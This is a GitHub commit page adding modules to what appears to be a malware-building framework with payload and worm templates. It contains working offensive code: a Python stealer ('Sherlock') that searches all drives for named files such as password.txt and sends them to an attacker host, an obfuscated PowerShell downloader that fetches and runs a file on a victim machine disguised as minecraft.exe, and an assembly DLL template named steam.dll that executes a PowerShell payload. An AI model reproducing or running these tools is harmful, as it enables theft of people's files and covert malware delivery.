-
Notifications
You must be signed in to change notification settings - Fork 0
Commit
This commit does not belong to any branch on this repository, and may belong to a fork outside of the repository.
- Loading branch information
xxx
committed
Jan 7, 2025
1 parent
f03329d
commit c8ed049
Showing
47 changed files
with
931 additions
and
156 deletions.
There are no files selected for viewing
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Original file line number | Diff line number | Diff line change |
---|---|---|
@@ -0,0 +1,12 @@ | ||
#!name##FOOD_sherlock_files | ||
#!types##data | ||
#!info##List of files to steal. | ||
#!load##list | ||
|
||
#!####You can put file names here. Separate the names with ENTER. ####### | ||
#!##example: | ||
#!##password.txt | ||
#!##accounts.json | ||
|
||
|
||
|
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Original file line number | Diff line number | Diff line change |
---|---|---|
@@ -1,18 +1,17 @@ | ||
#!name##My_Pyload | ||
#!types##payload | ||
#!info##A place for your own payload written in python. Go to the directory “OUTPUT/shortcuts” you will find there the file “my_payload.data” place the script there and then add it to the worm. | ||
#!info##A place for your own payload written in python. Go to directory “OUTPUT/shortcuts” you will find there file “my_payload.data” place the script there and then add it to the worm. | ||
#!render_FLAG##True | ||
#!import_FLAG##True | ||
#!empty##---------------------------------------------------------------------------------------------------------------------------------------------- | ||
#!empty## ----- DONT REMOVE HEADERS -------- | ||
#!empty## If your payload contains libraries that need to be downloaded via PIP then you can add a 'loader' to the payload. | ||
#!empty## Change the option: “PY_LOADER” to ‘True’. | ||
#!empty## Change the FLAG: "no_extract_FLAG to 'True' | ||
#!empty## Add code below the headers. Next save file and add to your worm | ||
#!options##PY_LOADER##False | ||
#!no_extract_FLAG##False | ||
#!CODE | ||
|
||
|
||
from time import sleep | ||
print("Hello World") | ||
sleep(1) | ||
print("END") | ||
|
||
|
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Original file line number | Diff line number | Diff line change |
---|---|---|
@@ -1,9 +1,9 @@ | ||
#!name##PPrint | ||
#!types##payload | ||
#!info##Simple payload to shellcode , displays a text. Default text is 'Hello World' | ||
#!info##Simple python payload for test to shellcode , displays a text. Default text is 'Hello World' | ||
#!render_FLAG##True | ||
#!reqVar##PP_text##Text to display##str | ||
#!setVar##PP_text##Hello World##str | ||
#!import_FLAG##True | ||
|
||
print("Hello") | ||
print("{{PP_text}}") |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Original file line number | Diff line number | Diff line change |
---|---|---|
@@ -0,0 +1,32 @@ | ||
#!name##PS_DeliveryObf | ||
#!types##payload | ||
#!info##Obfuscated code with random variables name in Powershell. It establishes a connection to the server, downloads the file and runs it on the victim's computer. Perfect for working with a 'send' server. | ||
#!reqVar##IP_ADDR##Host ip address##str | ||
#!reqVar##PSD_port##Host port number##int | ||
#!setVar##PSD_port##4444##int | ||
#!reqVar##PSD_fname##Name for the file stored on the victim's computer.##str | ||
#!setVar##PSD_fname##minecraft.exe##str | ||
#!garbageVar##PSDO_var1##128##randC##Variable name in chars (bytes) length | ||
#!garbageVar##PSDO_var2##154##randC##Variable name in chars (bytes) length | ||
#!garbageVar##PSDO_var3##86##randC##Variable name in chars (bytes) length | ||
#!garbageVar##PSDO_var4##133##randC##Variable name in chars (bytes) length | ||
#!garbageVar##PSDO_var5##112##randC##Variable name in chars (bytes) length | ||
#!garbageVar##PSDO_hip1##186##randC##Length of random string before IP address. | ||
#!garbageVar##PSDO_hip2##123##randC##Length of random string after IP address. | ||
#!garbageVar##PSDO_hfp1##177##randC##Length of random string before file path. | ||
#!garbageVar##PSDO_hfp2##75##randC##Length of random string after file path. | ||
#!render_FLAG##True | ||
#!payStep##format_ps | ||
#!lang##PowerShell | ||
|
||
${{PSDO_var1}} = '{{PSDO_hfp1}}c:/windows/temp/{{PSD_fname}}{{PSDO_hfp2}}'.Substring({{PSDO_hfp1|length}},{{PSD_fname|length + 16}}) | ||
${{PSDO_var2}} = New-Object System.Net.Sockets.TcpClient('{{PSDO_hip1}}{{IP_ADDR}}{{PSDO_hip2}}'.Substring({{PSDO_hip1|length}},{{IP_ADDR|length}}), {{PSD_port}}) | ||
${{PSDO_var3}} = ${{PSDO_var2}}.GetStream() | ||
${{PSDO_var4}} = [System.IO.File]::Create(${{PSDO_var1}}) | ||
${{PSDO_var5}} = New-Object Byte[] 4096 | ||
|
||
try { while (($bytesRead = ${{PSDO_var3}}.Read(${{PSDO_var5}}, 0, ${{PSDO_var5}}.Length)) -gt 0) {${{PSDO_var4}}.Write(${{PSDO_var5}}, 0, $bytesRead)}} finally {${{PSDO_var4}}.Close() | ||
${{PSDO_var3}}.Close() | ||
${{PSDO_var2}}.Close()} | ||
|
||
Start-Process -FilePath ${{PSDO_var1}} |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Original file line number | Diff line number | Diff line change |
---|---|---|
@@ -1,6 +1,7 @@ | ||
#!name##PS_Policy | ||
#!types##payload | ||
#!info##A command that launches the ability to execute scripts in powershell. | ||
#!coderOpt##FORMAT##PS_SCRIPT | ||
#!payStep##format_ps | ||
#!lang##PowerScript | ||
|
||
Set-ExecutionPolicy RemoteSigned -Scope CurrentUser |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Original file line number | Diff line number | Diff line change |
---|---|---|
@@ -0,0 +1,82 @@ | ||
#!name##Sherlock | ||
#!types##payload | ||
#!info##It looks for files with the specified name and uploads them to the server. | ||
#!import_FLAG##True | ||
#!render_FLAG##True | ||
#!reqVar##SHL_files##List of files to steal.##str | ||
#!setVar##SHL_files##[]##str | ||
#!reqFood##SHL_extra##FOOD_sherlock_files##Additional files to steal. You can add additional names to file 'sherlock_files' which is located in 'shortcuts' directory. | ||
#!reqVar##SHL_pause##Interval in seconds between file uploads.##int | ||
#!setVar##SHL_pause##1##int | ||
#!reqVar##IP_ADDR##Host ip address##str | ||
#!reqVar##SHL_port##Host port number##int | ||
#!setVar##SHL_port##4444##int | ||
|
||
|
||
import socket | ||
import os | ||
import threading | ||
import string | ||
from time import sleep | ||
|
||
|
||
class Sherlock: | ||
def __init__(self): | ||
self.base = {{SHL_files}} | ||
self.base.extend({{SHL_extra}}) | ||
self.find = [] | ||
self.lock = threading.Lock() | ||
self.diskl = string.ascii_lowercase | ||
self.base_dir = [f"{l}:/" for l in self.diskl if os.path.exists(f"{l}:/")] | ||
|
||
def _searching(self, bdirs): | ||
if not os.path.exists(bdirs): | ||
return | ||
for root, dirs, files in os.walk(bdirs): | ||
for f in files: | ||
if os.path.basename(f) in self.base: | ||
self.get_loot(os.path.join(root, f)) | ||
|
||
def searching(self): | ||
ls = [] | ||
for bd in self.base_dir: | ||
l = threading.Thread(target=self._searching, args=(bd, )) | ||
ls.append(l) | ||
l.start() | ||
for l in ls: | ||
l.join() | ||
self.send() | ||
|
||
|
||
def get_loot(self, fpath): | ||
with self.lock: | ||
self.find.append(fpath) | ||
|
||
def send(self): | ||
while True: | ||
if not self._connect(): | ||
sleep(3) | ||
else: | ||
break | ||
|
||
for fi in self.find: | ||
try: | ||
with open(fi, "rb") as f: | ||
self.sock.sendfile(f, 0) | ||
sleep({{SHL_pause}}) | ||
except: | ||
continue | ||
|
||
def _connect(self): | ||
try: | ||
self.sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM) | ||
self.sock.connect(("{{IP_ADDR}}", {{SHL_port}})) | ||
return True | ||
except: | ||
return False | ||
|
||
def start(self): | ||
self.searching() | ||
|
||
sh = Sherlock() | ||
sh.start() |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Original file line number | Diff line number | Diff line change |
---|---|---|
@@ -0,0 +1,10 @@ | ||
#!name##BasicDLL | ||
#!types##process | ||
#!info##Basic process to build DLL file | ||
|
||
|
||
|
||
[BASE] | ||
[SAVE_RAW] | ||
[MAKE_DLL_FILE] | ||
[DLL_LOADER] |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Original file line number | Diff line number | Diff line change |
---|---|---|
@@ -0,0 +1,17 @@ | ||
#!name##SDLL_Loader | ||
#!types##support | ||
#!info##The startup program, imports functions from the DLL file which causes it to execute. | ||
|
||
extern _ExitProcess@4 | ||
{% for func in DLL_EXPORT%} | ||
extern _{{func}} | ||
{% endfor%} | ||
|
||
section .text | ||
global _main | ||
|
||
_main: | ||
call _{{DLL_EXPORT[0]}} | ||
|
||
push 0 | ||
call _ExitProcess@4 |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Original file line number | Diff line number | Diff line change |
---|---|---|
@@ -0,0 +1,48 @@ | ||
#!name##Arkanoid | ||
#!types##worm | ||
#!info##Creates a DLL library (win32) containing a payload that is triggered from second EXE file as a function. You can also create another program yourself that uses this library. You can see an example use of function in “.asm” file. | ||
#!lang##asm | ||
#!system_FLAG##[W] | ||
#!processWorm##BasicDLL | ||
#!reqVar##_DLL_NAME##DLL file name##str | ||
#!setVar##_DLL_NAME##steam.dll##str | ||
#!setVar##_DLL_FUNC_myFunc##myFunc##str | ||
#!setVar##_DLL_FUNC_f2##Print##str | ||
#!reqPayload##ARK_script##PowerShell script to execute | ||
#!payStep##asm_stack_build | ||
#!payloadOpt##ARK_script##asm_stack_build_cmd##powershell.exe -Command "$" | ||
#!banned##module##starter##shadow##junk | ||
|
||
extern _system | ||
extern _ExitProcess@4 | ||
|
||
section .data | ||
|
||
section .text | ||
global _myFunc | ||
global _Print | ||
global DllMain | ||
|
||
|
||
DllMain: | ||
mov eax, 1 | ||
ret | ||
|
||
_efunc: | ||
push dword 0x00000000 | ||
{{ARK_script}} | ||
push esp | ||
call _system | ||
ret | ||
|
||
_myFunc: | ||
xor eax, eax | ||
mov eax, ebx | ||
call _efunc | ||
ret | ||
|
||
_Print: | ||
xor ebx, ebx | ||
xor eax, eax | ||
call _efunc | ||
ret |
Oops, something went wrong.